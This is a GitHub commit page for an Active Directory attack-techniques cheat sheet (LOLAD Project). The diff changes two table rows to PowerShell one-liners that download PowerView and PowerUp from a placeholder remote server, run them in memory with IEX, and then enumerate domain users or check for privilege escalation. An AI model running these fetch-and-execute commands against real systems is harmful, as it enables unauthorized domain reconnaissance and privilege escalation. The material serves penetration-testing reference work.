Skip to content

Commit

Permalink
Update index.html
Browse files Browse the repository at this point in the history
  • Loading branch information
LOLAD Project authored Nov 4, 2024
1 parent 6361a71 commit fb6159a
Showing 1 changed file with 2 additions and 2 deletions.
4 changes: 2 additions & 2 deletions index.html
Original file line number Diff line number Diff line change
Expand Up @@ -224,13 +224,13 @@ <h3>Active Directory Techniques and Commands</h3>
</tr>
<tr>
<td>Import PowerView Module</td>
<td><code>Import-Module .\PowerView.ps1</code></td>
<td><code>powershell -c "IEX (New-Object Net.WebClient).DownloadString('http://remoteserver/PowerView.ps1'); Get-NetUser"</code></td>
<td>PowerShell</td>
<td><a href="https://github.com/PowerShellMafia/PowerSploit" target="_blank">PowerSploit - PowerView</a></td>
</tr>
<tr>
<td>Import PowerUp Module</td>
<td><code>Import-Module .\PowerUp.ps1</code></td>
<td><code>powershell -c "IEX (New-Object Net.WebClient).DownloadString('http://remoteserver/PowerUp.ps1'); Invoke-AllChecks"</code></td>
<td>PowerShell</td>
<td><a href="https://github.com/PowerShellMafia/PowerSploit" target="_blank">PowerSploit - PowerUp</a></td>
</tr>
Expand Down

0 comments on commit fb6159a

Please sign in to comment.